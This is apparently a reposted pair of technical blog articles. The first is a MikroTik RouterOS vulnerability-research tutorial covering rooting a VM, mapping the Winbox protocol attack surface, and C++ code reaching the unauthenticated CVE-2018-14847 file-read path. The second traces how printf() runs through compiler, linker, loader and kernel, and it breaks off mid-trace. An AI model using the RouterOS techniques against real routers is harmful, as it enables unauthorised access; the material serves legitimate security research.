Make It Rain with MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying out six figures for MikroTik vulnerabilities, I figured it was a good time to finally put some of my RouterOS bug hunting into writing. Really, any time is a good time to investigate RouterOS. It’s a fun target. Hell, just preparing this write up I found a new unauthenticated vulnerability. You could too.


Laying the Groundwork

Now I know you’re already looking up Rolex prices, but calm down, Sparky. You still have work to do. Even if you’re just planning to download a simple fuzzer and pray for a pay day, you’ll still need to read this first section.

Acquiring Software

You don’t have to rush to Amazon to acquire a router. MikroTik makes RouterOS ISOs available on their website. The ISO can be used to create a virtual host with VirtualBox or VMWare.

Naturally, Mikrotik published 6.42.12 the day I published this blog

You can also extract the system files from the ISO.

albinolobster@ubuntu:~/6.42.11$ 7z x mikrotik-6.42.11.iso
7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,4 CPUs)
Processing archive: mikrotik-6.42.11.iso
Extracting  advanced-tools-6.42.11.npk
Extracting calea-6.42.11.npk
Extracting defpacks
Extracting dhcp-6.42.11.npk
Extracting dude-6.42.11.npk
Extracting gps-6.42.11.npk
Extracting hotspot-6.42.11.npk
Extracting ipv6-6.42.11.npk
Extracting isolinux
Extracting isolinux/boot.cat
Extracting isolinux/initrd.rgz
Extracting isolinux/isolinux.bin
Extracting isolinux/isolinux.cfg
Extracting isolinux/linux
Extracting isolinux/TRANS.TBL
Extracting kvm-6.42.11.npk
Extracting lcd-6.42.11.npk
Extracting LICENSE.txt
Extracting mpls-6.42.11.npk
Extracting multicast-6.42.11.npk
Extracting ntp-6.42.11.npk
Extracting ppp-6.42.11.npk
Extracting routing-6.42.11.npk
Extracting security-6.42.11.npk
Extracting system-6.42.11.npk
Extracting TRANS.TBL
Extracting ups-6.42.11.npk
Extracting user-manager-6.42.11.npk
Extracting wireless-6.42.11.npk
Extracting [BOOT]/Bootable_NoEmulation.img
Everything is Ok
Folders: 1
Files: 29
Size: 26232176
Compressed: 26335232

MikroTik packages a lot of their software in their custom .npk format. There’s a tool that’ll unpack these, but I prefer to just use binwalk.

albinolobster@ubuntu:~/6.42.11$ binwalk -e system-6.42.11.npk
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------
0 0x0 NPK firmware header, image size: 15616295, image name: "system", description: ""
4096 0x1000 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 9818075 bytes, 1340 inodes, blocksize: 262144 bytes, created: 2018-12-21 09:18:10
9822304 0x95E060 ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9842177 0x962E01 Unix path: /sys/devices/system/cpu
9846974 0x9640BE ELF, 32-bit LSB executable, Intel 80386, version 1 (SYSV)
9904147 0x972013 Unix path: /sys/devices/system/cpu
9928025 0x977D59 Copyright string: "Copyright 1995-2005 Mark Adler "
9928138 0x977DCA CRC32 polynomial table, little endian
9932234 0x978DCA CRC32 polynomial table, big endian
9958962 0x97F632 xz compressed data
12000822 0xB71E36 xz compressed data
12003148 0xB7274C xz compressed data
12104110 0xB8B1AE xz compressed data
13772462 0xD226AE xz compressed data
13790464 0xD26D00 xz compressed data
15613512 0xEE3E48 xz compressed data
15616031 0xEE481F Unix path: /var/pdb/system/crcbin/milo 3801732988
albinolobster@ubuntu:~/6.42.11$ ls -o ./_system-6.42.11.npk.extracted/squashfs-root/
total 64
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 bin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 boot
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 dev
lrwxrwxrwx 1 albinolobster 11 Dec 21 04:18 dude -> /flash/dude
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 etc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 flash
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 home
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 initrd
drwxr-xr-x 4 albinolobster 4096 Dec 21 04:18 lib
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 nova
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:18 old
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 pckg -> /ram/pckg
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 proc
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 ram
lrwxrwxrwx 1 albinolobster 9 Dec 21 04:18 rw -> /flash/rw
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sbin
drwxr-xr-x 2 albinolobster 4096 Dec 21 04:18 sys
lrwxrwxrwx 1 albinolobster 7 Dec 21 04:18 tmp -> /rw/tmp
drwxr-xr-x 3 albinolobster 4096 Dec 21 04:17 usr
drwxr-xr-x 5 albinolobster 4096 Dec 21 04:18 var
albinolobster@ubuntu:~/6.42.11$

Hack the Box

When looking for vulnerabilities it’s helpful to have access to the target’s filesystem. It’s also nice to be able to run tools, like GDB, locally. However, the shell that RouterOS offers isn’t a normal unix shell. It’s just a command line interface for RouterOS commands.

Who am I?!

Fortunately, I have a work around that will get us root. RouterOS will execute anything stored in the /rw/DEFCONF file due the way the rc.d script S12defconf is written.

Friends don’t let friends use eval

A normal user has no access to that file, but thanks to the magic of VMs and Live CDs you can create the file and insert any commands you want. The exact process takes too many words to explain. Instead I made a video. The screen recording is five minutes long and it goes from VM installation all the way through root telnet access.

With root telnet access you have full control of the VM. You can upload more tooling, attach to processes, watch logs, etc. You’re now ready to explore the router’s attack surface.


Is Anyone Listening?

You can quickly determine the network reachable attack surface thanks to the ps command.

Looks like the router listens on some well known ports (HTTP, FTP, Telnet, and SSH), but also some lesser known ports. btest on port 2000 is the bandwidth-test server. mproxy on 8291 is the service that WinBox interfaces with. WinBox is an administrative tool that runs on Windows. It shares all the same functionality as the Telnet, SSH, and HTTP interfaces.

Hello, I load .dll straight off the router. Yes, that has been a problem. Why do you ask?

The Real Attack Surface

The ps output makes it appear as if there are only a few binaries to bug hunt in. But nothing could be further from the truth. Both the HTTP server and Winbox speak a custom protocol that I’ll refer to as WinboxMessage (the actual code calls it nv::message). The protocol specifies which binary a message should be routed to. In truth, with all packages installed, there are about 90 different network reachable binaries that use the WinboxMessage protocol.

There’s also an easy way to figure out which binaries I’m referring to. A list can be found in each package’s /nova/etc/loader/*.x3 file. x3 is a custom file format so I wrote a parser. The example output goes on for a while so I snipped it a bit.

albinolobster@ubuntu:~/routeros/parse_x3/build$ ./x3_parse -f ~/6.42.11/_system-6.42.11.npk.extracted/squashfs-root/nova/etc/loader/system.x3 
/nova/bin/log,3
/nova/bin/radius,5
/nova/bin/moduler,6
/nova/bin/user,13
/nova/bin/resolver,14
/nova/bin/mactel,15
/nova/bin/undo,17
/nova/bin/macping,18
/nova/bin/cerm,19
/nova/bin/cerm-worker,75
/nova/bin/net,20
...

The x3 file also contains each binary’s “SYS TO” identifier. This is the identifier that the WinboxMessage protocol uses to determine where a message should be handled.


Me Talk WinboxMessage Pretty One Day

Knowing which binaries you should be able to reach is useful, but actually knowing how to communicate with them is quite a bit more important. In this section, I’ll walk through a couple of examples.

Getting Started

Let’s say I want to talk to /nova/bin/undo. Where do I start? Let’s start with some code. I’ve written a bunch of C++ that will do all of the WinboxMessage protocol formatting and session handling. I’ve also created a skeleton programthat you can build off of. main is pretty bare.

std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, ip, port))
{
return EXIT_FAILURE;
}
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

You can see the Winbox_Session class is responsible for connecting to the router. It’s also responsible for authentication logic as well as sending and receiving messages.

Now, from the output above, you know that /nova/bin/undo has a SYS TO identifier of 17. In order to reach undo, you need to update the code to create a message and set the appropriate SYS TO identifier (the new part is bolded).

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(17);

Command and Control

Each message also requires a command. As you’ll see in a little bit, each command will invoke specific functionality. There are some builtin commands (0xfe0000–0xfe00016) used by all handlers and some custom commands that have unique implementations.

Pop /nova/bin/undo into a disassembler and find the nv::Looper::Looperconstructor’s only code cross reference.

Follow the offset to vtable that I’ve labeled undo_handler and you should see the following.

This is the vtable for undo’s WinboxMessage handling. A bunch of the functions directly correspond to the builtin commands I mentioned earlier (e.g. 0xfe0001 is handled by nv::Handler::cmdGetPolicies). You can also see I’ve highlighted the unknown command function. Non-builtin commands get implemented there.

Since the non-builtin commands are usually the most interesting, you’re going to jump into cmdUnknown. You can see it starts with a command based jump table.

It looks like the commands start at 0x80001. Looking through the code a bit, command 0x80002 appears to have a useful string to test against. Let’s see if you can reach the “nothing to redo” code path.

You need to update the skeleton code to request command 0x80002. You’ll also need to add in the send and receive logic. I’ve bolded the new part.

WinboxMessage msg;
msg.set_to(17);
msg.set_command(0x80002);
msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

if (msg.has_error())
{
std::cerr << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
return EXIT_SUCCESS;

After compiling and executing the skeleton you should get the expected, “nothing to redo.”

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:524290,Uff0001:[17]}
resp: {uff0003:2,uff0004:2,uff0006:1,uff0008:16646150,sff0009:'nothing to redo',Uff0001:[],Uff0002:[17]}
nothing to redo
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

There’s Rarely Just One

In the previous example, you looked at the main handler in undo which was addressable simply as 17. However, the majority of binaries have multiple handlers. In the following example, you’ll examine /nova/bin/mproxy’s handler #2. I like this example because it’s the vector for CVE-2018–14847and it helps demystify these weird binary blobs:

My exploit for CVE-2018–14847 delivers a root shell. Just sayin’.

Hunting for Handlers

Open /nova/bin/mproxy in IDA and find the nv::Looper::addHandler import. In 6.42.11, there are only two code cross references to addHandler. It’s easy to identify the handler you’re interested in, handler 2, because the handler identifier is pushed onto the stack right before addHandler is called.

If you look up to where nv::Handler* is loaded into edi then you’ll find the offset for the handler’s vtable. This structure should look very familiar:

Again, I’ve highlighted the unknown command function. The unknown command function for this handler supports seven commands:

  1. Opens a file in /var/pckg/ for writing.
  2. Writes to the open file.
  3. Opens a file in /var/pckg/ for reading.
  4. Reads the open file.
  5. Cancels a file transfer.
  6. Creates a directory in /var/pckg/.
  7. Opens a file in /home/web/webfig/ for reading.

Commands 4, 5, and 7 do not require authentication.

Open a File

Let’s try to open a file in /home/web/webfig/ with command 7. This is the command that the FIRST_PAYLOAD in the exploit-db screenshot uses. If you look at the handling of command 7 in the code, you’ll see the first thing it looks for is a string with the id of 1.

The string is the filename you want to open. What file in /home/web/webfig is interesting?

The real answer is “none of them” look interesting. But list contains a list of the installed packages and their version numbers.

Let’s translate the open file request into WinboxMessage. Returning to the skeleton program, you’ll want to overwrite the set_to and set_commandcode. You’ll also want to insert the add_string. I’ve bolded the new portion again.

Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host"
<< std::endl;
return EXIT_FAILURE;
}
WinboxMessage msg;
msg.set_to(2,2); // mproxy, second handler
msg.set_command(7);
msg.add_string(1, "list"); // the file to open

msg.set_request_id(1);
msg.set_reply_expected(true);
winboxSession.send(msg);
std::cout << "req: " << msg.serialize_to_json() << std::endl;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
std::cout << "resp: " << msg.serialize_to_json() << std::endl;

When running this code you should see something like this:

albinolobster@ubuntu:~/routeros/poc/skeleton/build$ ./skeleton -i 10.0.0.104 -p 8291
req: {bff0005:1,uff0006:1,uff0007:7,s1:'list',Uff0001:[2,2]}
resp: {u2:1818,ufe0001:3,uff0003:2,uff0006:1,Uff0001:[],Uff0002:[2,2]}
albinolobster@ubuntu:~/routeros/poc/skeleton/build$

You can see the response from the server contains u2:1818. Look familiar?

1818 is the size of the list

As this is running quite long, I’ll leave the exercise of reading the file’s content up to the reader. This very simple CVE-2018–14847 proof of concept contains all the hints you’ll need.

Conclusion

I’ve shown you how to get the RouterOS software and root a VM. I’ve shown you the attack surface and taught you how to navigate the system binaries. I’ve given you a library to handle Winbox communication and shown you how to use it. If you want to go deeper and nerd out on protocol minutiae then check out my talk. Otherwise, you now know enough to be dangerous.

Good luck and happy hacking!

Реклама

Tearing apart printf()

( Original text )

If ‘Hello World’ is the first program for C students, then printf() is probably the first function. I’ve had to answer questions about printf() many times over the years, so I’ve finally set aside time for an informal writeup. The common questions fit roughly in to two forms:

  • Easy: How does printf mechanically solve the format problem?
  • Complex: How does printf actually display text on my console?

My usual answer?
«Just open up stdio.h and track it down»

This wild goose chase is not only a great learning experience, but also an interesting test for the dedicated beginner. Will they come back with an answer? If so, how detailed is it? What IS a good answer?


printf() in 30 seconds — TL;DR edition

printf’s execution is tailored to your system and generally goes like this:

  1. Your application uses printf()
  2. Your compiler/linker produce a binary. printf is a load-time pointer to your C library
  3. Your C runtime fixes up the format and sends the string to the kernel via a generic write
  4. Your OS mediates the string’s access to its console representation via a device driver
  5. Text appears in your screen

…but you probably already knew all that.

This is the common case for user-space applications running on an off-the-shelf system. (Side-stepping virtual/embedded/distributed/real-mode machines for the moment).

A more complicated answer starts with: It depends — printf mechanics vary across long list of things: Your compiler toolchain, system architecture to include the operating system, and obviously how you’ve used it in your program. The diagram above is generally correct but precisely useless for any specific situation.

If you’re not impressed, that’s good. Let’s refine it.


printf() in 90 seconds — Interview question edition

  1. You include the <stdio.h> header in your application
  2. You use printf non-trivially in your app.
  3. Your compiler produces object code — printf is recognized, but unresolved
  4. The linker constructs the executable, printf is tagged for run-time resolution
  5. You execute your program. Standard library is mapped in the process address space
  6. A call to printf() jumps to library code
  7. The formatted string is resolved in a temporary buffer
  8. Standard library writes to the stdout buffered stream. Eventual kernel write entry
  9. Kernel calls a driver write operation for the associated console
  10. Console output buffer is updated with the new string
  11. Output text appears on your console

Sounds better? There’s still a lot missing, including any mention of system specifics. More things to think about (in no particular order):

  • Are we using static or dynamic linkage? Normally printf is run-time linked, but there are exceptions.
  • What OS is this? The differences between them are drastic — When/how is stdout managed? What is the console and how is it updated? What is the kernel entry/syscall procedure…
  • Closely related to the OS…what kind of executable is this? If ELF, we need to talk about the GOT / PLT. If PE (Windows), then we need an import directory.
  • What kind of terminal are you using? Standard laptop/desktop? University cluster over ssh? Is this a virtual machine?
  • This list could go on forever, and all answers affect what really happens behind the scenes.

Things to know before continuing

The next part is targeted for C beginners who want to explore how functions execute through a complex system. I’m keeping the discussion at a high-level so we can focus on how many parts of the problem contribute to a whole solution. I’ll provide references to source code and technical documents so readers can explore on their own. No blog substitutes for authoritative documentation.

Now for a more important question:
Why do beginners get stuck searching for a detailed answer about basic functions like printf()?

I’ll boil it down to three problems:

Not understanding the distinct roles of the compiler, standard library, operating system, and hardware. You can’t look at just one aspect of a system and expect to understand how a function like printf() works. Each component handles a part of the ‘printf’ problem and passes the work to the next using common interfaces along the way. C compilers try to adhere to the ISO C standards. Operating systems may also follow standards such as POSIX/SUS. Standardization streamlines interoperability and portability, but with the cost of code complexity. Beginners often struggle following the chain of code, especially when the standard requirements end and the ‘actual work’ begins between the interfaces. The common complaint: Too many seemingly useless function calls between the interface and the work. This is the price of interoperability and there’s no easy + maintainable + scalable way around it!

Not grasping [compile/link/load/run]-time dynamics. Manual static analysis has limits, and so following any function through the standard library source code inevitably leads to a dead end — an unresolved jump table, an opaque macro with multiple expansions, or a hard stop at the end: an ambiguous function pointer. In printf’s case, that would be *write, which the operating system promises will be exist at run-time. Modern compilers and OSs are designed to be multi-platform and thus every possible code path that could exist is visible prior to compilation. Beginners may get lost in a code base where much of the source ‘compiles away’ and functions resolve dynamically at execution. Trivial case: If you call printf() on a basic string without formats, your compiler may emit a call to ‘puts’, discarding your printf entirely!

Not enough exposure to common abstractions used in complex software systems. Tracing any function through the compiler and OS means working through many disparate ideas in computing. For instance, many I/O operations involve the idea of a character stream. Buffering character I/O with streams has been part of Unix System V since the early 1980s, thanks in part to Dennis Ritchie, co-author of ‘The C Programming Language’. Since the 1990s, multiprocessing has become the norm. Tracing printf means stepping around locks, mutexes, semaphores, and other synchronization tools. More recently, i18n has upped the ante for simple console output. All these concepts taken together often distract and overwhelm beginners who are simply trying to understand one core problem.

Bottom line: Compilers, libraries, operating systems, and hardware are complex; we need to understand how each works together as a system in order to truly understand how printf() works.


printf() in 1000 seconds — TMI edition

(or ‘Too-specific-to-apply-to-any-system-except-mine-on-the-day-I-wrote-this edition’)

The best way to answer these questions is to work through the details on an actual system.

$uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

$gcc --version
gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-16)
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

$ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Key points:


Step 0 — What is printf?

printf() is an idea that the folks at Bell Labs believed in as early as 1972: A programmer should be able to produce output using various formats without understanding exactly what’s going on under the hood.

This idea is merely an interface.

The programmer calls printf and the system will handle the rest. That is why you’re presumably reading this article — hiding implementation details works!

Early compilers supported programmers exclusively through built-in functions. When toolchains became a business in the early 1980s (Manx/Aztec C, Lattice C), many provided C and ASM source code for common functions that developers could #include in their projects as needed. This allowed customization of built-ins at the application level — no more rebuilding your toolchain for each project. However, programmers were still at the mercy of various brands of compilers, each bringing their own vision of how to implement these functions and run-time.

Thankfully, most of this hassel has gone away today. So if you want to use printf…


Step 1 — Include the <stdio.h> header

Goal: Tap into the infinite power of the C standard library

The simple line of code #include <stdio.h> is possible across the vast majority of computer systems thanks to standards. Specifically, ISO-9899.

In 1978, Brian Kernighan and Dennis Ritchie described printf in its full variadic form to include nine types of formats:

printf(control, arg1, arg2, ...);    # K&R (1st ed.)

This was as close as the industry would get to a standard for the next decade. Between 1983 and 1989, the ANSI committee worked on the formal standard that eventually brought the printf interface to its familiar form:

int printf(const char *format, ...);   # ANSI C (1989)

Here’s an oft-forgotten bit of C trivia: printf returns a value (the actual character output count). The interface from 1978 didn’t mention a return value, but the implied return type is integer under K&R rules. The earliest known compiler (linked above) did not return any value.

The most recent C standard from 2011 shows that the interface changed by only one keyword in the intervening 20 years:

int printf(const char * restrict format, ...);  # Latest ISO C (2011)

‘restrict’ (a C99 feature) allows the compiler to optimize without concern for pointer aliasing.

Over the past 40 years, the interface for printf is mostly unchanged, thus highly backwards compatible. However, the feature set has grown quite a bit:

1972 1978 1989 2011
%d — decimal Top 3 from ’72 All from ’78 plus… Too many!
%o — octal %x — hexadecimal %i — signed int Read
%s — string %u — unsigned decimal %p — void pointer the
%p — string ptr %c — byte/character %n — output count manual
%e,f,g — floats/dbl %% — complete form pp. 309-315

Step 2 — Use printf() with formats

Goal: Make sure your call to printf actually uses printf()

We’ll test out printf() with two small plagarized programs. However, only one of them is truly a candidate to trace printf().

Trivial printf() — printf0.c Better printf() — printf1.c
$ cat printf0.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World\n");
  return 0;
}     
$ cat printf1.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World %d\n",1);
  return 0;
}

The difference is that printf0.c does not actually contain any formats, thus there is no reason to use printf. Your compiler won’t bother to use it. In fact, you can’t even disable this ‘optimization’ using GCC -O0 because the substitution (fold) happens during semantic analysis (GCC lingo: Gimplification), not during optimization. To see this in action, we must compile!

Possible trap: Some compilers may recognize the ‘1’ literal used in printf1.c, fold it in to the string, and avoid printf() in both cases. If that happens to you, substitute an expression that must be evaluated.


Step 3 — Compiler produces object code

Goal: Organize the components (symbols) of your application

Compiling programs results in an object file, which contains records of every symbol in the source file. Each .c file compiles to a .o file but none of seen any other files (no linking yet). Let’s look at the symbols in both of the programs from the last step.

Trivial printf() More useful printf()
$ gcc printf0.c -c -o printf0.o
$ nm printf0.o
0000000000000000 T main
                 U puts
$ gcc printf1.c -c -o printf1.o
$ nm printf1.o
0000000000000000 T main
                 U printf

As expected, the trivial printf usage has a symbol to a more simple function, puts. The file that included a format instead as a symbol for printf. In both cases, the symbol is undefined. The compiler doesn’t know where puts() or printf() are defined, but it knows that they exist thanks to stdio.h. It’s up to the linker to resolve the symbols.


Step 4 — Linking brings it all together

Goal: Build a binary that includes all code in one package

Let’s compile and linking both files again, this time both statically and dynamically.

$ gcc printf0.c -o printf0            # Trivial printf dynamic linking
$ gcc printf1.c -o printf1            # Better printf dynamic linking
$ gcc printf0.c -o printf0_s -static  # Trivial printf static linking
$ gcc printf1.c -o printf1_s -static  # Better printf static linking

Possible trap: You need to have the static standard library available to statically link (libc.a). Most systems already have the shared library built-in (libc.so). Windows users will need a libc.lib and maybe a libmsvcrt.lib. I haven’t tested in an MS environment in a while.

Static linking pulls all the standard library object code in to the executable. The benefit for us is that all of the code executed in user space is now self-contained in this single file and we can easily trace to see the standard library functions. In real life, you rarely want to do this. This disadvantages are just too great, especially for maintainability. Here’s an obvious disadvantage:

$ ls -l printf1*
total 1696
-rwxrwxr-x. 1 maiz maiz   8520 Mar 31 13:38 printf1     # Dynamic
-rw-rw-r--. 1 maiz maiz    101 Mar 31 12:57 printf1.c
-rw-rw-r--. 1 maiz maiz   1520 Mar 31 13:37 printf1.o
-rwxrwxr-x. 1 maiz maiz 844000 Mar 31 13:40 printf1_s   # Static

Our test binary blew up from 8kb to 844kb. Let’s take a look at the symbol count in each:

$ nm printf1.o | wc -l
2                      # Object file symbol count (main, printf)
$ nm printf1 | wc -l
34                     # Dynamic-linked binary symbol count
$ nm printf1_s | wc -l
1873                   # Static-linked binary symbol count

Our original, unlinked object file had just the two symbols we already saw (main and printf). The dynamic-linked binary has 34 symbols, most of which correspond to the C runtime, which sets up the environment. Finally, our static-linked binary has nearly 2000 symbols, which include everything that could be used from the standard library.

As you may know, this has a significant impact on load-time and run-time


Step 5 — Loader prepares the run-time

Goal: Set up the execution environment

The dynamic-linked binary has more work to do than its static brother. The static version included 1873 symbols, but the dynamic binary only inluded 34 with the binary. It needs to find the code in shared libraries and memory map it in to the process address space. We can watch this in action by using strace.

Dynamic-linked printf() syscall trace

$ strace ./printf1
execve("./printf1", ["./printf1"], [/* 47 vars */]) = 0
brk(NULL) = 0x1dde000
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=83694, ...}) = 0
mmap(NULL, 83694, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f59bce6d000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2127336, ...}) = 0
mmap(NULL, 3940800, ..., 3, 0) = 0x7f59bc89f000
mprotect(0x7f59bca57000, 2097152, PROT_NONE) = 0
mmap(0x7f59bcc57000, 24576, ..., 3, 0x1b8000) = 0x7f59bcc57000
mmap(0x7f59bcc5d000, 16832, ..., -1, 0) = 0x7f59bcc5d000
close(3) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce6c000
mmap(NULL, 8192, ..., -1, 0) = 0x7f59bce6a000
arch_prctl(ARCH_SET_FS, 0x7f59bce6a740) = 0
mprotect(0x7f59bcc57000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f59bce83000, 4096, PROT_READ) = 0
munmap(0x7f59bce6d000, 83694) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce81000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

Each line is a syscall. The first is just after bash clones in to printf1_s, and the write syscall is near the bottom. The 21 syscalls between brk and the final fstatare devoted to loading shared libraries. This is the load-time penalty for dynamic-linking. Don’t worry if this seems like a mess, we won’t be using it. If you’re interested in more detail, here is the full dump with walkthrough

Now let’s look at the memory map for the process

Dynamic-linked printf() memory map

$ cat /proc/3177/maps
00400000-00401000 r-xp 00000000         ./printf1
00600000-00601000 r--p 00000000         ./printf1
00601000-00602000 rw-p 00001000         ./printf1
7f59bc89f000-7f59bca57000 r-xp 00000000 /usr/lib64/libc-2.17.so
7f59bca57000-7f59bcc57000 ---p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc57000-7f59bcc5b000 r--p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc5b000-7f59bcc5d000 rw-p 001bc000 /usr/lib64/libc-2.17.so
7f59bcc5d000-7f59bcc62000 rw-p 00000000  
7f59bcc62000-7f59bcc83000 r-xp 00000000 /usr/lib64/ld-2.17.so
7f59bce6a000-7f59bce6d000 rw-p 00000000  
7f59bce81000-7f59bce83000 rw-p 00000000  
7f59bce83000-7f59bce84000 r--p 00021000 /usr/lib64/ld-2.17.so
7f59bce84000-7f59bce85000 rw-p 00022000 /usr/lib64/ld-2.17.so
7f59bce85000-7f59bce86000 rw-p 00000000  
7fff89031000-7fff89052000 rw-p 00000000 [stack]
7fff8914e000-7fff89150000 r-xp 00000000 [vdso]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

Our 8kb binary fits in to three 4kb memory pages (top three lines). The standard library has been mapped in to the ~middle of the address space. Code execution begins in the code area at the top, and jumps in to the shared library as needed.

This is the last I’ll mention the dynamic-linked version. We’ll use the static version from now on since it’s easier to trace.

Static-linked printf() syscall trace

$ strace ./printf1_s
execve("./printf1_s", ["./printf1_s"],[/*47 vars*/]) = 0
uname({sysname="Linux", nodename="...", ...}) = 0
brk(NULL) = 0x1d4a000
brk(0x1d4b1c0) = 0x1d4b1c0
arch_prctl(ARCH_SET_FS, 0x1d4a880) = 0
brk(0x1d6c1c0) = 0x1d6c1c0
brk(0x1d6d000) = 0x1d6d000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7faad3151000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

The static-linked binary uses far fewer syscalls. I’ve highlighted three of them near the bottom: fstatmmap, and write. These occur during printf(). We’ll trace this better in the next step. First, let’s look at the static memory map:

Static-linked printf() memory map

$ cat /proc/3237/printf1_s
00400000-004b8000 r-xp 00000000         ./printf1_s
006b7000-006ba000 rw-p 000b7000         ./printf1_s
006ba000-006df000 rw-p 00000000         [heap]
7ffff7ffc000-7ffff7ffd000 rw-p 00000000 
7ffff7ffd000-7ffff7fff000 r-xp 00000000 [vdso]
7ffffffde000-7ffffffff000 rw-p 00000000 [stack]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

No hint of a shared library. That’s because all the code is now included on the first two lines within the printf1_s binary. The static binary is using 187 pages of memory, just short of 800kb. This follows what we know about the large binary size.

Now we’ll move on to the more interesting part: execution.


Step 6 — printf call jumps to the standard library

Goal: Follow the standard library call sequence at run-time

The programmer shapes code for the printf interface then the run-time library bridges the standard API and the OS interface.

Key point: A compiler/library is free to handle logic any way it wants between interfaces. After printf is called, there is no standard defined procedure required, except that the correct output is produced and within certain boundaries. There are many possible paths to the output, and every toolchain handles it differently. In general, this work is done in two parts: A platform-independent side where a call to printf solves the format substitution problem (Step-6, Step 7). The other is a platform-dependent side, which calls in to the OS kernel using the properly-formatted string (Step 8).

The next three steps will focus solely on the static-linked version of printf. It’s less tedious to trace static-linked source, especially through the kernel in the next few steps. Note that the number of instructions executed between both are ~2300 for dynamic and ~1600 for static.

In addition to printf, compliant C compilers also implement:

fprintf() — A generalized version of printf except the output can go to any file stream, not just the console. fprintf is notable the C standard defines supported format types in its description. fprintf() isn’t used, but it’s good to know about since it’s related to the next function

vfprintf() — Similar to fprintf except the variadic arguments are reduced to a single pointer to a va_list. libc does almost all printing work in this function, including format replacement. (f)printf merely calls vfprintf almost immediately. vfprintf then uses the libio interface to write final strings to streams.

These high-level print functions obey buffering rules defined on the stream descriptor. The output string is constructed in the buffer using internal GCC (libio) functions. Finally, write is the final step before handing work to the kernel. If you aren’t familiar with how these work, I recommend reading about the GCC wayof managing I/O

Bonus: Some extra reading about buffering with nice diagrams

Let’s trace our path through the standard library

printf() execution sequence …printf execution continued
